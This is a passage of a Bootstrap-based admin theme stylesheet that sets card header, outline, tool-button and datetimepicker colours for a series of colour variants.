.card.bg-lime .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-lime .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-lime .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-lime .bootstrap-datetimepicker-widget table td.second:hover,
.card.bg-gradient-lime .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-gradient-lime .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-gradient-lime .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-gradient-lime .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-gradient-lime .bootstrap-datetimepicker-widget table td.second:hover {
background: #00d75e;
color: #1F2D3D;
}
.card.bg-lime .bootstrap-datetimepicker-widget table td.today::before,
.card.bg-gradient-lime .bootstrap-datetimepicker-widget table td.today::before {
border-bottom-color: #1F2D3D;
}
.card.bg-lime .bootstrap-datetimepicker-widget table td.active,
.card.bg-lime .bootstrap-datetimepicker-widget table td.active:hover,
.card.bg-gradient-lime .bootstrap-datetimepicker-widget table td.active,
.card.bg-gradient-lime .bootstrap-datetimepicker-widget table td.active:hover {
background: #34ff8d;
color: #1F2D3D;
}
.card-fuchsia:not(.card-outline) > .card-header {
background-color: #f012be;
}
.card-fuchsia:not(.card-outline) > .card-header,
.card-fuchsia:not(.card-outline) > .card-header a {
color: #ffffff;
}
.card-fuchsia:not(.card-outline) > .card-header a.active {
color: #1F2D3D;
}
.card-fuchsia.card-outline {
border-top: 3px solid #f012be;
}
.card-fuchsia.card-outline-tabs > .card-header a:hover {
border-top: 3px solid #dee2e6;
}
.card-fuchsia.card-outline-tabs > .card-header a.active {
border-top: 3px solid #f012be;
}
.bg-fuchsia .btn-tool,
.bg-gradient-fuchsia .btn-tool,
.card-fuchsia:not(.card-outline) .btn-tool {
color: rgba(255, 255, 255, 0.8);
}
.bg-fuchsia .btn-tool:hover,
.bg-gradient-fuchsia .btn-tool:hover,
.card-fuchsia:not(.card-outline) .btn-tool:hover {
color: #ffffff;
}
.card.bg-fuchsia .bootstrap-datetimepicker-widget .table td,
.card.bg-fuchsia .bootstrap-datetimepicker-widget .table th,
.card.bg-gradient-fuchsia .bootstrap-datetimepicker-widget .table td,
.card.bg-gradient-fuchsia .bootstrap-datetimepicker-widget .table th {
border: none;
}
.card.bg-fuchsia .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-fuchsia .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-fuchsia .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-fuchsia .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-fuchsia .bootstrap-datetimepicker-widget table td.second:hover,
.card.bg-gradient-fuchsia .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-gradient-fuchsia .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-gradient-fuchsia .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-gradient-fuchsia .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-gradient-fuchsia .bootstrap-datetimepicker-widget table td.second:hover {
background: #cc0da1;
color: #ffffff;
}
.card.bg-fuchsia .bootstrap-datetimepicker-widget table td.today::before,
.card.bg-gradient-fuchsia .bootstrap-datetimepicker-widget table td.today::before {
border-bottom-color: #ffffff;
}
.card.bg-fuchsia .bootstrap-datetimepicker-widget table td.active,
.card.bg-fuchsia .bootstrap-datetimepicker-widget table td.active:hover,
.card.bg-gradient-fuchsia .bootstrap-datetimepicker-widget table td.active,
.card.bg-gradient-fuchsia .bootstrap-datetimepicker-widget table td.active:hover {
background: #f342cb;
color: #ffffff;
}
.card-maroon:not(.card-outline) > .card-header {
background-color: #d81b60;
}
.card-maroon:not(.card-outline) > .card-header,
.card-maroon:not(.card-outline) > .card-header a {
color: #ffffff;
}
.card-maroon:not(.card-outline) > .card-header a.active {
color: #1F2D3D;
}
.card-maroon.card-outline {
border-top: 3px solid #d81b60;
}
.card-maroon.card-outline-tabs > .card-header a:hover {
border-top: 3px solid #dee2e6;
}
.card-maroon.card-outline-tabs > .card-header a.active {
border-top: 3px solid #d81b60;
}
.bg-maroon .btn-tool,
.bg-gradient-maroon .btn-tool,
.card-maroon:not(.card-outline) .btn-tool {
color: rgba(255, 255, 255, 0.8);
}
.bg-maroon .btn-tool:hover,
.bg-gradient-maroon .btn-tool:hover,
.card-maroon:not(.card-outline) .btn-tool:hover {
color: #ffffff;
}
.card.bg-maroon .bootstrap-datetimepicker-widget .table td,
.card.bg-maroon .bootstrap-datetimepicker-widget .table th,
.card.bg-gradient-maroon .bootstrap-datetimepicker-widget .table td,
.card.bg-gradient-maroon .bootstrap-datetimepicker-widget .table th {
border: none;
}
.card.bg-maroon .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-maroon .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-maroon .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-maroon .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-maroon .bootstrap-datetimepicker-widget table td.second:hover,
.card.bg-gradient-maroon .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-gradient-maroon .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-gradient-maroon .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-gradient-maroon .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-gradient-maroon .bootstrap-datetimepicker-widget table td.second:hover {
background: #b41650;
color: #ffffff;
}
.card.bg-maroon .bootstrap-datetimepicker-widget table td.today::before,
.card.bg-gradient-maroon .bootstrap-datetimepicker-widget table td.today::before {
border-bottom-color: #ffffff;
}
.card.bg-maroon .bootstrap-datetimepicker-widget table td.active,
.card.bg-maroon .bootstrap-datetimepicker-widget table td.active:hover,
.card.bg-gradient-maroon .bootstrap-datetimepicker-widget table td.active,
.card.bg-gradient-maroon .bootstrap-datetimepicker-widget table td.active:hover {
background: #e73f7c;
color: #ffffff;
}
.card-blue:not(.card-outline) > .card-header {
background-color: #007bff;
}
.card-blue:not(.card-outline) > .card-header,
.card-blue:not(.card-outline) > .card-header a {
color: #ffffff;
}
.card-blue:not(.card-outline) > .card-header a.active {
color: #1F2D3D;
}
.card-blue.card-outline {
border-top: 3px solid #007bff;
}
.card-blue.card-outline-tabs > .card-header a:hover {
border-top: 3px solid #dee2e6;
}
.card-blue.card-outline-tabs > .card-header a.active {
border-top: 3px solid #007bff;
}
.bg-blue .btn-tool,
.bg-gradient-blue .btn-tool,
.card-blue:not(.card-outline) .btn-tool {
color: rgba(255, 255, 255, 0.8);
}
.bg-blue .btn-tool:hover,
.bg-gradient-blue .btn-tool:hover,
.card-blue:not(.card-outline) .btn-tool:hover {
color: #ffffff;
}
.card.bg-blue .bootstrap-datetimepicker-widget .table td,
.card.bg-blue .bootstrap-datetimepicker-widget .table th,
.card.bg-gradient-blue .bootstrap-datetimepicker-widget .table td,
.card.bg-gradient-blue .bootstrap-datetimepicker-widget .table th {
border: none;
}
.card.bg-blue .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-blue .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-blue .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-blue .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-blue .bootstrap-datetimepicker-widget table td.second:hover,
.card.bg-gradient-blue .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-gradient-blue .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-gradient-blue .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-gradient-blue .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-gradient-blue .bootstrap-datetimepicker-widget table td.second:hover {
background: #0067d6;
color: #ffffff;
}
.card.bg-blue .bootstrap-datetimepicker-widget table td.today::before,
.card.bg-gradient-blue .bootstrap-datetimepicker-widget table td.today::before {
border-bottom-color: #ffffff;
}
.card.bg-blue .bootstrap-datetimepicker-widget table td.active,
.card.bg-blue .bootstrap-datetimepicker-widget table td.active:hover,
.card.bg-gradient-blue .bootstrap-datetimepicker-widget table td.active,
.card.bg-gradient-blue .bootstrap-datetimepicker-widget table td.active:hover {
background: #3395ff;
color: #ffffff;
}
.card-indigo:not(.card-outline) > .card-header {
background-color: #6610f2;
}
.card-indigo:not(.card-outline) > .card-header,
.card-indigo:not(.card-outline) > .card-header a {
color: #ffffff;
}
.card-indigo:not(.card-outline) > .card-header a.active {
color: #1F2D3D;
}
.card-indigo.card-outline {
border-top: 3px solid #6610f2;
}
.card-indigo.card-outline-tabs > .card-header a:hover {
border-top: 3px solid #dee2e6;
}
.card-indigo.card-outline-tabs > .card-header a.active {
border-top: 3px solid #6610f2;
}
.bg-indigo .btn-tool,
.bg-gradient-indigo .btn-tool,
.card-indigo:not(.card-outline) .btn-tool {
color: rgba(255, 255, 255, 0.8);
}
.bg-indigo .btn-tool:hover,
.bg-gradient-indigo .btn-tool:hover,
.card-indigo:not(.card-outline) .btn-tool:hover {
color: #ffffff;
}
.card.bg-indigo .bootstrap-datetimepicker-widget .table td,
.card.bg-indigo .bootstrap-datetimepicker-widget .table th,
.card.bg-gradient-indigo .bootstrap-datetimepicker-widget .table td,
.card.bg-gradient-indigo .bootstrap-datetimepicker-widget .table th {
border: none;
}
.card.bg-indigo .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-indigo .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-indigo .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-indigo .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-indigo .bootstrap-datetimepicker-widget table td.second:hover,
.card.bg-gradient-indigo .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-gradient-indigo .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-gradient-indigo .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-gradient-indigo .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-gradient-indigo .bootstrap-datetimepicker-widget table td.second:hover {
background: #550bce;
color: #ffffff;
}
.card.bg-indigo .bootstrap-datetimepicker-widget table td.today::before,
.card.bg-gradient-indigo .bootstrap-datetimepicker-widget table td.today::before {
border-bottom-color: #ffffff;
}
.card.bg-indigo .bootstrap-datetimepicker-widget table td.active,
.card.bg-indigo .bootstrap-datetimepicker-widget table td.active:hover,
.card.bg-gradient-indigo .bootstrap-datetimepicker-widget table td.active,
.card.bg-gradient-indigo .bootstrap-datetimepicker-widget table td.active:hover {
background: #8540f5;
color: #ffffff;
}
.card-purple:not(.card-outline) > .card-header {
background-color: #6f42c1;
}
.card-purple:not(.card-outline) > .card-header,
.card-purple:not(.card-outline) > .card-header a {
color: #ffffff;
}
.card-purple:not(.card-outline) > .card-header a.active {
color: #1F2D3D;
}
.card-purple.card-outline {
border-top: 3px solid #6f42c1;
}
.card-purple.card-outline-tabs > .card-header a:hover {
border-top: 3px solid #dee2e6;
}
.card-purple.card-outline-tabs > .card-header a.active {
border-top: 3px solid #6f42c1;
}
.bg-purple .btn-tool,
.bg-gradient-purple .btn-tool,
.card-purple:not(.card-outline) .btn-tool {
color: rgba(255, 255, 255, 0.8);
}
.bg-purple .btn-tool:hover,
.bg-gradient-purple .btn-tool:hover,
.card-purple:not(.card-outline) .btn-tool:hover {
color: #ffffff;
}
.card.bg-purple .bootstrap-datetimepicker-widget .table td,
.card.bg-purple .bootstrap-datetimepicker-widget .table th,
.card.bg-gradient-purple .bootstrap-datetimepicker-widget .table td,
.card.bg-gradient-purple .bootstrap-datetimepicker-widget .table th {
border: none;
}
.card.bg-purple .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-purple .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-purple .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-purple .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-purple .bootstrap-datetimepicker-widget table td.second:hover,
.card.bg-gradient-purple .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-gradient-purple .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-gradient-purple .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-gradient-purple .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-gradient-purple .bootstrap-datetimepicker-widget table td.second:hover {
background: #5d36a4;
color: #ffffff;
}
.card.bg-purple .bootstrap-datetimepicker-widget table td.today::before,
.card.bg-gradient-purple .bootstrap-datetimepicker-widget table td.today::before {
border-bottom-color: #ffffff;
}
.card.bg-purple .bootstrap-datetimepicker-widget table td.active,
.card.bg-purple .bootstrap-datetimepicker-widget table td.active:hover,
.card.bg-gradient-purple .bootstrap-datetimepicker-widget table td.active,
.card.bg-gradient-purple .bootstrap-datetimepicker-widget table td.active:hover {
background: #8c68ce;
color: #ffffff;
}
.card-pink:not(.card-outline) > .card-header {
background-color: #e83e8c;
}
.card-pink:not(.card-outline) > .card-header,
.card-pink:not(.card-outline) > .card-header a {
color: #ffffff;
}
.card-pink:not(.card-outline) > .card-header a.active {
color: #1F2D3D;
}
.card-pink.card-outline {
border-top: 3px solid #e83e8c;
}
.card-pink.card-outline-tabs > .card-header a:hover {
border-top: 3px solid #dee2e6;
}
.card-pink.card-outline-tabs > .card-header a.active {
border-top: 3px solid #e83e8c;
}
.bg-pink .btn-tool,
.bg-gradient-pink .btn-tool,
.card-pink:not(.card-outline) .btn-tool {
color: rgba(255, 255, 255, 0.8);
}
.bg-pink .btn-tool:hover,
.bg-gradient-pink .btn-tool:hover,
.card-pink:not(.card-outline) .btn-tool:hover {
color: #ffffff;
}
.card.bg-pink .bootstrap-datetimepicker-widget .table td,
.card.bg-pink .bootstrap-datetimepicker-widget .table th,
.card.bg-gradient-pink .bootstrap-datetimepicker-widget .table td,
.card.bg-gradient-pink .bootstrap-datetimepicker-widget .table th {
border: none;
}
.card.bg-pink .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-pink .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-pink .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-pink .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-pink .bootstrap-datetimepicker-widget table td.second:hover,
.card.bg-gradient-pink .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-gradient-pink .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-gradient-pink .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-gradient-pink .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-gradient-pink .bootstrap-datetimepicker-widget table td.second:hover {
background: #e21b76;
color: #ffffff;
}
.card.bg-pink .bootstrap-datetimepicker-widget table td.today::before,
.card.bg-gradient-pink .bootstrap-datetimepicker-widget table td.today::before {
border-bottom-color: #ffffff;
}
.card.bg-pink .bootstrap-datetimepicker-widget table td.active,
.card.bg-pink .bootstrap-datetimepicker-widget table td.active:hover,
.card.bg-gradient-pink .bootstrap-datetimepicker-widget table td.active,
.card.bg-gradient-pink .bootstrap-datetimepicker-widget table td.active:hover {
background: #ed6ca7;
color: #ffffff;
}
.card-red:not(.card-outline) > .card-header {
background-color: #dc3545;
}
.card-red:not(.card-outline) > .card-header,
.card-red:not(.card-outline) > .card-header a {
color: #ffffff;
}
.card-red:not(.card-outline) > .card-header a.active {
color: #1F2D3D;
}
.card-red.card-outline {
border-top: 3px solid #dc3545;
}
.card-red.card-outline-tabs > .card-header a:hover {
border-top: 3px solid #dee2e6;
}
.card-red.card-outline-tabs > .card-header a.active {
border-top: 3px solid #dc3545;
}
.bg-red .btn-tool,
.bg-gradient-red .btn-tool,
.card-red:not(.card-outline) .btn-tool {
color: rgba(255, 255, 255, 0.8);
}
.bg-red .btn-tool:hover,
.bg-gradient-red .btn-tool:hover,
.card-red:not(.card-outline) .btn-tool:hover {
color: #ffffff;
}
.card.bg-red .bootstrap-datetimepicker-widget .table td,
.card.bg-red .bootstrap-datetimepicker-widget .table th,
.card.bg-gradient-red .bootstrap-datetimepicker-widget .table td,
.card.bg-gradient-red .bootstrap-datetimepicker-widget .table th {
border: none;
}
.card.bg-red .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-red .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-red .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-red .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-red .bootstrap-datetimepicker-widget table td.second:hover,
.card.bg-gradient-red .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-gradient-red .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-gradient-red .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-gradient-red .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-gradient-red .bootstrap-datetimepicker-widget table td.second:hover {
background: #c62232;
color: #ffffff;
}
.card.bg-red .bootstrap-datetimepicker-widget table td.today::before,
.card.bg-gradient-red .bootstrap-datetimepicker-widget table td.today::before {
border-bottom-color: #ffffff;
}
.card.bg-red .bootstrap-datetimepicker-widget table td.active,
.card.bg-red .bootstrap-datetimepicker-widget table td.active:hover,
.card.bg-gradient-red .bootstrap-datetimepicker-widget table td.active,
.card.bg-gradient-red .bootstrap-datetimepicker-widget table td.active:hover {
background: #e4606d;
color: #ffffff;
}
.card-orange:not(.card-outline) > .card-header {
background-color: #fd7e14;
}
.card-orange:not(.card-outline) > .card-header,
.card-orange:not(.card-outline) > .card-header a {
color: #1F2D3D;
}
.card-orange:not(.card-outline) > .card-header a.active {
color: #1F2D3D;
}
.card-orange.card-outline {
border-top: 3px solid #fd7e14;
}
.card-orange.card-outline-tabs > .card-header a:hover {
border-top: 3px solid #dee2e6;
}
.card-orange.card-outline-tabs > .card-header a.active {
border-top: 3px solid #fd7e14;
}
.bg-orange .btn-tool,
.bg-gradient-orange .btn-tool,
.card-orange:not(.card-outline) .btn-tool {
color: rgba(31, 45, 61, 0.8);
}
.bg-orange .btn-tool:hover,
.bg-gradient-orange .btn-tool:hover,
.card-orange:not(.card-outline) .btn-tool:hover {
color: #1F2D3D;
}
.card.bg-orange .bootstrap-datetimepicker-widget .table td,
.card.bg-orange .bootstrap-datetimepicker-widget .table th,
.card.bg-gradient-orange .bootstrap-datetimepicker-widget .table td,
.card.bg-gradient-orange .bootstrap-datetimepicker-widget .table th {
border: none;
}
.card.bg-orange .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-orange .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-orange .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-orange .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-orange .bootstrap-datetimepicker-widget table td.second:hover,
.card.bg-gradient-orange .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-gradient-orange .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-gradient-orange .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-gradient-orange .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-gradient-orange .bootstrap-datetimepicker-widget table td.second:hover {
background: #e66a02;
color: #1F2D3D;
}
.card.bg-orange .bootstrap-datetimepicker-widget table td.today::before,
.card.bg-gradient-orange .bootstrap-datetimepicker-widget table td.today::before {
border-bottom-color: #1F2D3D;
}
.card.bg-orange .bootstrap-datetimepicker-widget table td.active,
.card.bg-orange .bootstrap-datetimepicker-widget table td.active:hover,
.card.bg-gradient-orange .bootstrap-datetimepicker-widget table td.active,
.card.bg-gradient-orange .bootstrap-datetimepicker-widget table td.active:hover {
background: #fd9a47;
color: #1F2D3D;
}
.card-yellow:not(.card-outline) > .card-header {
background-color: #ffc107;
}
.card-yellow:not(.card-outline) > .card-header,
.card-yellow:not(.card-outline) > .card-header a {
color: #1F2D3D;
}
.card-yellow:not(.card-outline) > .card-header a.active {
color: #1F2D3D;
}
.card-yellow.card-outline {
border-top: 3px solid #ffc107;
}
.card-yellow.card-outline-tabs > .card-header a:hover {
border-top: 3px solid #dee2e6;
}
.card-yellow.card-outline-tabs > .card-header a.active {
border-top: 3px solid #ffc107;
}
.bg-yellow .btn-tool,
.bg-gradient-yellow .btn-tool,
.card-yellow:not(.card-outline) .btn-tool {
color: rgba(31, 45, 61, 0.8);
}
.bg-yellow .btn-tool:hover,
.bg-gradient-yellow .btn-tool:hover,
.card-yellow:not(.card-outline) .btn-tool:hover {
color: #1F2D3D;
}
.card.bg-yellow .bootstrap-datetimepicker-widget .table td,
.card.bg-yellow .bootstrap-datetimepicker-widget .table th,
.card.bg-gradient-yellow .bootstrap-datetimepicker-widget .table td,
.card.bg-gradient-yellow .bootstrap-datetimepicker-widget .table th {
border: none;
}
.card.bg-yellow .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-yellow .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-yellow .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-yellow .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-yellow .bootstrap-datetimepicker-widget table td.second:hover,
.card.bg-gradient-yellow .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-gradient-yellow .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-gradient-yellow .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-gradient-yellow .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-gradient-yellow .bootstrap-datetimepicker-widget table td.second:hover {
background: #dda600;
color: #1F2D3D;
}
.card.bg-yellow .bootstrap-datetimepicker-widget table td.today::before,
.card.bg-gradient-yellow .bootstrap-datetimepicker-widget table td.today::before {
border-bottom-color: #1F2D3D;
}
.card.bg-yellow .bootstrap-datetimepicker-widget table td.active,
.card.bg-yellow .bootstrap-datetimepicker-widget table td.active:hover,
.card.bg-gradient-yellow .bootstrap-datetimepicker-widget table td.active,
.card.bg-gradient-yellow .bootstrap-datetimepicker-widget table td.active:hover {
background: #ffce3a;
color: #1F2D3D;
}
.card-green:not(.card-outline) > .card-header {
background-color: #28a745;
}
.card-green:not(.card-outline) > .card-header,
.card-green:not(.card-outline) > .card-header a {
color: #ffffff;
}
.card-green:not(.card-outline) > .card-header a.active {
color: #1F2D3D;
}
.card-green.card-outline {
border-top: 3px solid #28a745;
}
.card-green.card-outline-tabs > .card-header a:hover {
border-top: 3px solid #dee2e6;
}
.card-green.card-outline-tabs > .card-header a.active {
border-top: 3px solid #28a745;
}
.bg-green .btn-tool,
.bg-gradient-green .btn-tool,
.card-green:not(.card-outline) .btn-tool {
color: rgba(255, 255, 255, 0.8);
}
.bg-green .btn-tool:hover,
.bg-gradient-green .btn-tool:hover,
.card-green:not(.card-outline) .btn-tool:hover {
color: #ffffff;
}
.card.bg-green .bootstrap-datetimepicker-widget .table td,
.card.bg-green .bootstrap-datetimepicker-widget .table th,
.card.bg-gradient-green .bootstrap-datetimepicker-widget .table td,
.card.bg-gradient-green .bootstrap-datetimepicker-widget .table th {
border: none;
}
.card.bg-green .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-green .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-green .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-green .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-green .bootstrap-datetimepicker-widget table td.second:hover,
.card.bg-gradient-green .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-gradient-green .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-gradient-green .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-gradient-green .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-gradient-green .bootstrap-datetimepicker-widget table td.second:hover {
background: #208637;
color: #ffffff;
}
.card.bg-green .bootstrap-datetimepicker-widget table td.today::before,
.card.bg-gradient-green .bootstrap-datetimepicker-widget table td.today::before {
border-bottom-color: #ffffff;
}
.card.bg-green .bootstrap-datetimepicker-widget table td.active,
.card.bg-green .bootstrap-datetimepicker-widget table td.active:hover,
.card.bg-gradient-green .bootstrap-datetimepicker-widget table td.active,
.card.bg-gradient-green .bootstrap-datetimepicker-widget table td.active:hover {
background: #34ce57;
color: #ffffff;
}
.card-teal:not(.card-outline) > .card-header {
background-color: #20c997;
}
.card-teal:not(.card-outline) > .card-header,
.card-teal:not(.card-outline) > .card-header a {
color: #ffffff;
}
.card-teal:not(.card-outline) > .card-header a.active {
color: #1F2D3D;
}
.card-teal.card-outline {
border-top: 3px solid #20c997;
}
.card-teal.card-outline-tabs > .card-header a:hover {
border-top: 3px solid #dee2e6;
}
.card-teal.card-outline-tabs > .card-header a.active {
border-top: 3px solid #20c997;
}
.bg-teal .btn-tool,
.bg-gradient-teal .btn-tool,
.card-teal:not(.card-outline) .btn-tool {
color: rgba(255, 255, 255, 0.8);
}
.bg-teal .btn-tool:hover,
.bg-gradient-teal .btn-tool:hover,
.card-teal:not(.card-outline) .btn-tool:hover {
color: #ffffff;
}
.card.bg-teal .bootstrap-datetimepicker-widget .table td,
.card.bg-teal .bootstrap-datetimepicker-widget .table th,
.card.bg-gradient-teal .bootstrap-datetimepicker-widget .table td,
.card.bg-gradient-teal .bootstrap-datetimepicker-widget .table th {
border: none;
}
.card.bg-teal .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-teal .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-teal .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-teal .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-teal .bootstrap-datetimepicker-widget table td.second:hover,
.card.bg-gradient-teal .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-gradient-teal .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-gradient-teal .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-gradient-teal .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-gradient-teal .bootstrap-datetimepicker-widget table td.second:hover {
background: #1aa67d;
color: #ffffff;
}
.card.bg-teal .bootstrap-datetimepicker-widget table td.today::before,
.card.bg-gradient-teal .bootstrap-datetimepicker-widget table td.today::before {
border-bottom-color: #ffffff;
}
.card.bg-teal .bootstrap-datetimepicker-widget table td.active,
.card.bg-teal .bootstrap-datetimepicker-widget table td.active:hover,
.card.bg-gradient-teal .bootstrap-datetimepicker-widget table td.active,
.card.bg-gradient-teal .bootstrap-datetimepicker-widget table td.active:hover {
background: #3ce0af;
color: #ffffff;
}
.card-cyan:not(.card-outline) > .card-header {
background-color: #17a2b8;
}
.card-cyan:not(.card-outline) > .card-header,
.card-cyan:not(.card-outline) > .card-header a {
color: #ffffff;
}
.card-cyan:not(.card-outline) > .card-header a.active {
color: #1F2D3D;
}
.card-cyan.card-outline {
border-top: 3px solid #17a2b8;
}
.card-cyan.card-outline-tabs > .card-header a:hover {
border-top: 3px solid #dee2e6;
}
.card-cyan.card-outline-tabs > .card-header a.active {
border-top: 3px solid #17a2b8;
}
.bg-cyan .btn-tool,
.bg-gradient-cyan .btn-tool,
.card-cyan:not(.card-outline) .btn-tool {
color: rgba(255, 255, 255, 0.8);
}
.bg-cyan .btn-tool:hover,
.bg-gradient-cyan .btn-tool:hover,
.card-cyan:not(.card-outline) .btn-tool:hover {
color: #ffffff;
}
.card.bg-cyan .bootstrap-datetimepicker-widget .table td,
.card.bg-cyan .bootstrap-datetimepicker-widget .table th,
.card.bg-gradient-cyan .bootstrap-datetimepicker-widget .table td,
.card.bg-gradient-cyan .bootstrap-datetimepicker-widget .table th {
border: none;
}
.card.bg-cyan .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-cyan .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-cyan .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-cyan .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-cyan .bootstrap-datetimepicker-widget table td.second:hover,
.card.bg-gradient-cyan .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-gradient-cyan .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-gradient-cyan .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-gradient-cyan .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-gradient-cyan .bootstrap-datetimepicker-widget table td.second:hover {
background: #128294;
color: #ffffff;
}
.card.bg-cyan .bootstrap-datetimepicker-widget table td.today::before,
.card.bg-gradient-cyan .bootstrap-datetimepicker-widget table td.today::before {
border-bottom-color: #ffffff;
}
.card.bg-cyan .bootstrap-datetimepicker-widget table td.active,
.card.bg-cyan .bootstrap-datetimepicker-widget table td.active:hover,
.card.bg-gradient-cyan .bootstrap-datetimepicker-widget table td.active,
.card.bg-gradient-cyan .bootstrap-datetimepicker-widget table td.active:hover {
background: #1fc8e3;
color: #ffffff;
}
.card-white:not(.card-outline) > .card-header {
background-color: #ffffff;
}
.card-white:not(.card-outline) > .card-header,
.card-white:not(.card-outline) > .card-header a {
color: #1F2D3D;
}
.card-white:not(.card-outline) > .card-header a.active {
color: #1F2D3D;
}
.card-white.card-outline {
border-top: 3px solid #ffffff;
}
.card-white.card-outline-tabs > .card-header a:hover {
border-top: 3px solid #dee2e6;
}
.card-white.card-outline-tabs > .card-header a.active {
border-top: 3px solid #ffffff;
}
.bg-white .btn-tool,
.bg-gradient-white .btn-tool,
.card-white:not(.card-outline) .btn-tool {
color: rgba(31, 45, 61, 0.8);
}
.bg-white .btn-tool:hover,
.bg-gradient-white .btn-tool:hover,
.card-white:not(.card-outline) .btn-tool:hover {
color: #1F2D3D;
}
.card.bg-white .bootstrap-datetimepicker-widget .table td,
.card.bg-white .bootstrap-datetimepicker-widget .table th,
